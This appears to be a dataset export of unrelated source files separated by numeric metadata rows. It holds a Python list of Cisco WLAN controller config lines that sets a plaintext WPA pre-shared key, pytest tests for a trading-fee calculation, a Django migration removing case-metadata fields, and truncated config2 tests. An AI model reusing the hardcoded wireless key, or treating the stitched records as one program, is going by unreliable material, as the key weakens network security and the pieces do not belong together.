ConfigLine(config_line="config wlan enable 15", parents=()),
ConfigLine(config_line="config wlan create 16 POP-101-VOICE POP-101-VOICE", parents=()),
ConfigLine(config_line="config wlan radio 16 all", parents=()),
ConfigLine(config_line="config wlan interface 16 voice", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 16", parents=()),
ConfigLine(config_line="config wlan nac radius disable 16", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa enable 16", parents=()),
ConfigLine(config_line="config wlan security ft disable 16", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 16", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 16", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 16 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 16", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 16", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 16", parents=()),
ConfigLine(config_line="config wlan qos 16 platinum", parents=()),
ConfigLine(config_line="config wlan avc 16 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 16", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 16", parents=()),
ConfigLine(config_line="config wlan chd 16 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 16 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 16", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 16", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 16", parents=()),
ConfigLine(config_line="config wlan exclusionlist 16 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 16 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 16", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 16", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 16", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 16 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 16", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 16", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 16", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 16", parents=()),
ConfigLine(config_line="config wlan dms enable 16", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 16", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 16", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 16", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 16", parents=()),
ConfigLine(config_line="config wlan mdns disable 16", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii AntTfLJO 16", parents=()),
ConfigLine(config_line="config wlan enable 16", parents=()),
ConfigLine(config_line="config acl counter start", parents=()),
ConfigLine(config_line="config acl create Cisco8821-Provision", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 1", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 1 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 1 68 68", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 1 67 67", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 1 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 1 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 2", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 2 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 2 67 67", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 2 68 68", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 2 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 2 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 3", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 3 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 3 0 65535", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 3 5060 5061", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 3 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 3 deny", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 4", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 4 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 4 5060 5061", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 4 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 4 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 4 deny", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 5", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 5 17", parents=()),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 5 0 65535", parents=()),
ConfigLine(
config_line="config acl rule destination address Cisco8821-Provision 5 192.168.2.177 255.255.255.255",
parents=(),
),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 5 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 5 in", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 5 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 6", parents=()),
ConfigLine(config_line="config acl rule protocol Cisco8821-Provision 6 17", parents=()),
ConfigLine(
config_line="config acl rule source address Cisco8821-Provision 6 192.168.2.177 255.255.255.255", parents=()
),
ConfigLine(config_line="config acl rule source port range Cisco8821-Provision 6 0 65535", parents=()),
ConfigLine(config_line="config acl rule destination port range Cisco8821-Provision 6 0 65535", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 6 out", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 6 permit", parents=()),
ConfigLine(config_line="config acl rule add Cisco8821-Provision 7", parents=()),
ConfigLine(config_line="config acl rule direction Cisco8821-Provision 7 any", parents=()),
ConfigLine(config_line="config acl rule action Cisco8821-Provision 7 deny", parents=()),
ConfigLine(config_line="config acl apply Cisco8821-Provision", parents=()),
ConfigLine(config_line="config wlan create 13 Cisco8821-Provision cisco", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid disable 13", parents=()),
ConfigLine(config_line="config wlan acl 13 Cisco8821-Provision", parents=()),
ConfigLine(config_line="config wlan qos 13 silver", parents=()),
ConfigLine(config_line="config wlan wmm allow 13", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 disable 13", parents=()),
ConfigLine(config_line="config wlan security wpa disable 13", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 13 local radius ldap", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 13", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 13", parents=()),
ConfigLine(config_line="config wlan dms enable 13", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 13", parents=()),
ConfigLine(config_line="config wlan interface 13 voice", parents=()),
ConfigLine(config_line="config wlan chd 13 disable", parents=()),
ConfigLine(config_line="config wlan mdns disable 13", parents=()),
ConfigLine(config_line="config wlan exclusionlist 13 0", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 13", parents=()),
ConfigLine(config_line="config wlan session-timeout 13 1800", parents=()),
ConfigLine(config_line="config wlan mfp client enable 13", parents=()),
ConfigLine(config_line="config wlan enable 13", parents=()),
]
| 81.454327
| 236
| 0.740387
| 4,355
| 33,885
| 5.668657
| 0.069346
| 0.252117
| 0.315146
| 0.409689
| 0.943533
| 0.940536
| 0.917568
| 0.869729
| 0.760117
| 0.601815
| 0
| 0.06124
| 0.13354
| 33,885
| 415
| 237
| 81.650602
| 0.779598
| 0
| 0
| 0.062802
| 0
| 0.014493
| 0.488269
| 0.006463
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002415
| 0.002415
| 0
| 0.002415
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f07520be04cc2767891964a9c4e32cc62a221014
| 7,051
|
py
|
Python
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 3
|
2022-02-17T16:11:39.000Z
|
2022-03-10T23:46:19.000Z
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 10
|
2022-01-25T21:49:20.000Z
|
2022-03-31T00:32:29.000Z
|
tests/libraries/position/test_fee.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 2
|
2022-01-21T01:04:54.000Z
|
2022-02-23T08:38:20.000Z
|
def test_trading_fee(position):
    """Trading fee is charged on the position's notional.

    Covers long and short sides, both with a price move (100 -> 150) and
    with zero price change; expected fees are precomputed constants.
    """
    entry_price = 100000000000000000000  # 100
    notional = 10000000000000000000  # 10
    debt = 2000000000000000000  # 2
    liquidated = False
    trading_fee_rate = 750000000000000
    oi = int((notional / entry_price) * 1000000000000000000)  # 0.1
    fraction = 1000000000000000000  # 1
    cap_payoff = 5000000000000000000  # 5

    # (is_long, current_price, expected fee); the last two pin the current
    # price to the entry price to cover the zero-price-change case.
    cases = [
        (True, 150000000000000000000, 11250000000000000),
        (False, 150000000000000000000, 3750000000000000),
        (True, entry_price, 7500000000000000),
        (False, entry_price, 7500000000000000),
    ]
    for is_long, current_price, expect in cases:
        # NOTE: mid_ratio itself is exercised in test_entry_price.py
        mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
        pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
        actual = position.tradingFee(pos, fraction, oi, oi, current_price,
                                     cap_payoff, trading_fee_rate)
        assert expect == actual
def test_trading_fee_when_entry_not_equal_to_mid(position):
    """Trading fee when the entry price differs from the mid price.

    Long entries sit above mid (101 vs 100), short entries below (99 vs
    100); each side is checked with a price move and with no price change.
    """
    mid_price = 100000000000000000000  # 100
    notional = 10000000000000000000  # 10
    debt = 2000000000000000000  # 2
    liquidated = False
    trading_fee_rate = 750000000000000
    oi = int((notional / mid_price) * 1000000000000000000)  # 0.1
    fraction = 1000000000000000000  # 1
    cap_payoff = 5000000000000000000  # 5

    # (is_long, entry_price, current_price, expected fee)
    cases = [
        (True, 101000000000000000000, 150000000000000000000, 11175000000000000),
        (False, 99000000000000000000, 150000000000000000000, 3675000000000000),
        # zero price change: current price pinned to the entry price
        (True, 101000000000000000000, 101000000000000000000, 7500000000000000),
        (False, 99000000000000000000, 99000000000000000000, 7500000000000000),
    ]
    for is_long, entry_price, current_price, expect in cases:
        # NOTE: mid_ratio itself is exercised in test_entry_price.py
        mid_ratio = position.calcEntryToMidRatio(entry_price, mid_price)
        pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
        actual = position.tradingFee(pos, fraction, oi, oi, current_price,
                                     cap_payoff, trading_fee_rate)
        assert expect == actual
def test_trading_fee_when_fraction_less_than_one(position):
    """Trading fee scales with the fraction (0.25) of the position unwound."""
    entry_price = 100000000000000000000  # 100
    current_price = 150000000000000000000  # 150
    notional = 10000000000000000000  # 10
    debt = 2000000000000000000  # 2
    liquidated = False
    trading_fee_rate = 750000000000000
    oi = int((notional / entry_price) * 1000000000000000000)  # 0.1
    fraction = 250000000000000000  # 0.25
    cap_payoff = 5000000000000000000  # 5

    # (is_long, expected fee) — long and short sides of the same unwind
    for is_long, expect in ((True, 2812500000000000), (False, 937500000000000)):
        # NOTE: mid_ratio itself is exercised in test_entry_price.py
        mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
        pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
        actual = position.tradingFee(pos, fraction, oi, oi, current_price,
                                     cap_payoff, trading_fee_rate)
        assert expect == actual
def test_trading_fee_when_payoff_greater_than_cap(position):
    """Trading fee for a long whose price move (100 -> 800) exceeds the 5x payoff cap."""
    entry_price = 100000000000000000000  # 100
    current_price = 800000000000000000000  # 800
    notional = 10000000000000000000  # 10
    debt = 2000000000000000000  # 2
    is_long = True
    liquidated = False
    trading_fee_rate = 750000000000000
    oi = int((notional / entry_price) * 1000000000000000000)  # 0.1
    fraction = 1000000000000000000  # 1
    cap_payoff = 5000000000000000000  # 5

    # NOTE: mid_ratio itself is exercised in test_entry_price.py
    mid_ratio = position.calcEntryToMidRatio(entry_price, entry_price)
    pos = (notional, debt, mid_ratio, is_long, liquidated, oi)
    fee = position.tradingFee(pos, fraction, oi, oi, current_price,
                              cap_payoff, trading_fee_rate)
    assert fee == 45000000000000000
| 39.172222
| 70
| 0.69437
| 830
| 7,051
| 5.640964
| 0.087952
| 0.091841
| 0.044853
| 0.03994
| 0.947245
| 0.947245
| 0.947245
| 0.907518
| 0.907518
| 0.907518
| 0
| 0.175023
| 0.239115
| 7,051
| 179
| 71
| 39.391061
| 0.69767
| 0.159694
| 0
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088
| 1
| 0.032
| false
| 0
| 0
| 0
| 0.032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65256482f8aa4e0a95469ad2cdcd3d1faa043d8d
| 2,648
|
py
|
Python
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 134
|
2017-07-12T17:03:06.000Z
|
2022-03-27T06:38:29.000Z
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 1,362
|
2017-06-22T17:42:49.000Z
|
2022-03-31T15:28:00.000Z
|
capstone/capdb/migrations/0090_auto_20200127_2030.py
|
rachelaus/capstone
|
2affa02706f9b1a99d032c66f258a7421c40a35e
|
[
"MIT"
] | 38
|
2017-06-22T14:46:23.000Z
|
2022-03-16T05:32:54.000Z
|
# Generated by Django 2.2.9 on 2020-01-27 20:30
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the CaseText model, four scope indexes, and the denormalized
    court/jurisdiction columns from both case-metadata tables.

    The operations list is built programmatically but is element-for-element
    identical (same operations, same order) to the generated original.
    """

    dependencies = [
        ('capdb', '0089_auto_20200127_1957'),
    ]

    operations = (
        [migrations.RemoveField(model_name='casetext', name='metadata')]
        + [
            migrations.RemoveIndex(model_name='casemetadata', name=index_name)
            for index_name in (
                'idx_in_scope',
                'idx_in_scope_reporter',
                'idx_in_scope_jurisdiction',
                'idx_in_scope_court',
            )
        ]
        # The same seven columns are removed first from the live table and
        # then from its historical shadow table.
        + [
            migrations.RemoveField(model_name=model, name=field)
            for model in ('casemetadata', 'historicalcasemetadata')
            for field in (
                'court_name',
                'court_name_abbreviation',
                'court_slug',
                'jurisdiction_name',
                'jurisdiction_name_long',
                'jurisdiction_slug',
                'jurisdiction_whitelisted',
            )
        ]
        + [migrations.DeleteModel(name='CaseText')]
    )
| 28.473118
| 48
| 0.554003
| 194
| 2,648
| 7.298969
| 0.221649
| 0.120763
| 0.275424
| 0.317797
| 0.80791
| 0.80791
| 0.80791
| 0.724576
| 0.158192
| 0
| 0
| 0.01794
| 0.347432
| 2,648
| 92
| 49
| 28.782609
| 0.801505
| 0.016994
| 0
| 0.825581
| 1
| 0
| 0.253749
| 0.138793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011628
| 0
| 0.046512
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65369793ad1f869e99347b8cdbb3f2cb3ac0aca1
| 83,773
|
py
|
Python
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 20
|
2018-06-26T22:48:27.000Z
|
2021-05-06T06:07:27.000Z
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 19
|
2018-10-10T09:16:45.000Z
|
2021-02-08T13:55:37.000Z
|
config2/tests/test_config.py
|
billycao/python-config2
|
d474e911a9ca196dbbeaafdb560f499b885de823
|
[
"MIT"
] | 8
|
2018-10-05T07:12:33.000Z
|
2022-01-03T12:12:39.000Z
|
# =========================================
# DEPS
# --------------------------------------
import rootpath
# presumably adds the repository root to sys.path so `config2` imports resolve
# when the tests are run from a checkout — TODO confirm against `rootpath` docs
rootpath.append()
import json
from os import path
from os import environ as env
from attributedict.collections import AttributeDict
from config2.tests import helper
from config2.serializers import yaml_ as yaml
import config2
import config2.config as module
# short aliases used throughout the test module
Config = module.Config
deepdict = AttributeDict.dict
# =========================================
# FIXTURES
# --------------------------------------
fixture_foo_root_path = helper.fixture_path('foo')
fixture_foo_src_nested_path = helper.fixture_path('foo', 'src', 'nested')
fixture_bar_root_path = helper.fixture_path('bar')
fixture_baz_root_path = helper.fixture_path('baz')
package_root_path = helper.root_path()

# Environment-variable overrides used by the env-mapping tests.
CUSTOM_ENV = {
    'A1': 'override',
    'A2': 'should have no effect',
    'C2': '42',
}


def _read_fixture(relative_path):
    """Read a fixture file's raw text content."""
    # NOTE(review): helper.fixture() appears to return an open file object that
    # is never closed — presumably fine for short-lived tests; verify in helper.
    return helper.fixture(relative_path).read()


def _file_entry(basename, raw, data):
    """Build the file-descriptor dict the Config loader is expected to expose."""
    return {
        'name': '{0}.yml'.format(basename),
        'extension': 'yml',
        'format': 'yaml',
        'basename': basename,
        'raw': raw,
        'path': '{0}/config/{1}.yml'.format(fixture_foo_root_path, basename),
        'data': data,
    }


def _config_fixture(basename):
    """Load `foo/config/<basename>.yml` and return (raw content, parsed data)."""
    content = _read_fixture('foo/config/{0}.yml'.format(basename))
    return content, yaml.unpack(content)


def _merged_fixture(basename):
    """Load a pre-merged expectation file `config/<basename>.yml` -> (raw, data)."""
    content = _read_fixture('config/{0}.yml'.format(basename))
    return content, yaml.unpack(content)


# custom-environment-variables.yml: raw content plus a copy with the CUSTOM_ENV
# placeholder keys substituted by their JSON-encoded values.
env_variables_file_basename = 'custom-environment-variables'
env_variables_file_content = _read_fixture('foo/config/{0}.yml'.format(env_variables_file_basename))
env_variables_file_content_mapped = env_variables_file_content
for key in CUSTOM_ENV:
    env_variables_file_content_mapped = env_variables_file_content_mapped.replace(key, json.dumps(CUSTOM_ENV[key]))
env_variables_file_data = yaml.unpack(env_variables_file_content_mapped)
env_variables_file = _file_entry(env_variables_file_basename, env_variables_file_content, env_variables_file_data)

default_config_file_basename = 'default'
default_config_file_content, default_config_file_data = _config_fixture(default_config_file_basename)
default_config_file = _file_entry(default_config_file_basename, default_config_file_content, default_config_file_data)

development_config_file_basename = 'development'
development_config_file_content, development_config_file_data = _config_fixture(development_config_file_basename)
development_config_file = _file_entry(development_config_file_basename, development_config_file_content, development_config_file_data)

foo_config_file_basename = 'foo'
foo_config_file_content, foo_config_file_data = _config_fixture(foo_config_file_basename)
foo_config_file = _file_entry(foo_config_file_basename, foo_config_file_content, foo_config_file_data)

production_config_file_basename = 'production'
production_config_file_content, production_config_file_data = _config_fixture(production_config_file_basename)
production_config_file = _file_entry(production_config_file_basename, production_config_file_content, production_config_file_data)

env_config_files = [
    development_config_file,  # development.yml
    foo_config_file,  # foo.yml
    production_config_file,  # production.yml
]
config_files = [
    default_config_file,  # default.yml
    development_config_file,  # development.yml
    foo_config_file,  # foo.yml
    production_config_file,  # production.yml
]
files = [
    env_variables_file,  # custom-environment-variables.yml
    default_config_file,  # default.yml
    development_config_file,  # development.yml
    foo_config_file,  # foo.yml
    production_config_file,  # production.yml
]

default_config_data = default_config_file.get('data')

# Pre-merged expectation files: `default.yml` combined with each env overlay.
default_and_development_config_basename = 'default+development'
default_and_development_config_content, default_and_development_config_data = _merged_fixture(default_and_development_config_basename)

default_and_foo_config_basename = 'default+foo'
default_and_foo_config_content, default_and_foo_config_data = _merged_fixture(default_and_foo_config_basename)

default_and_production_config_basename = 'default+production'
default_and_production_config_content, default_and_production_config_data = _merged_fixture(default_and_production_config_basename)
class TestCase(helper.TestCase):
def test__import(self):
self.assertModule(module)
def test__instance(self):
self.assertTrue(isinstance(module.Config(), Config))
def test_env(self):
self.assertTrue(hasattr(module.Config(), '__env__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__env__, None)
config = module.Config('development')
self.assertEqual(config.__env__, 'development')
config = module.Config('foo')
self.assertEqual(config.__env__, 'foo')
config = module.Config('production')
self.assertEqual(config.__env__, 'production')
config = module.Config('xxx')
self.assertEqual(config.__env__, 'xxx')
def test_path(self):
self.assertTrue(hasattr(module.Config(), '__path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__path__, path.join(package_root_path, 'config2', 'tests'))
config = module.Config(path = package_root_path)
self.assertEqual(config.__path__, package_root_path)
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__path__, fixture_foo_src_nested_path)
def test_root_path(self):
self.assertTrue(hasattr(module.Config(), '__root_path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__root_path__, package_root_path)
config = module.Config()
self.assertEqual(config.__root_path__, package_root_path)
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertEqual(config.__root_path__, fixture_foo_root_path)
def test_config_path(self):
self.assertTrue(hasattr(module.Config(), '__config_path__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertEqual(config.__config_path__, path.join(fixture_foo_root_path, 'config'))
config = module.Config(path = fixture_foo_root_path, detect = 'not_a_root_file')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
config = module.Config(path = fixture_foo_src_nested_path, detect = 'not_a_root_file')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'config'))
def test_config_directory_name(self):
self.assertTrue(hasattr(module.Config(), '__config_directory_name__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertEqual(config.__config_directory_name__, 'config')
config = module.Config()
self.assertEqual(config.__config_directory_name__, 'config')
config = module.Config(config_directory_name = 'foo')
self.assertEqual(config.__config_directory_name__, 'foo')
self.assertEqual(config.__config_path__, path.join(package_root_path, 'foo'))
def test_config_data(self):
self.assertTrue(hasattr(module.Config(), '__config_data__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('development')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_development_config_data)
config = module.Config('foo')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_foo_config_data)
config = module.Config('production')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_and_production_config_data)
config = module.Config('xxx')
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), {})
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__config_data__), default_config_data)
def test_files(self):
self.assertTrue(hasattr(module.Config(), '__files__'))
env['A1'] = CUSTOM_ENV.get('A1')
env['A2'] = CUSTOM_ENV.get('A2')
env['C2'] = CUSTOM_ENV.get('C2')
config = module.Config()
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
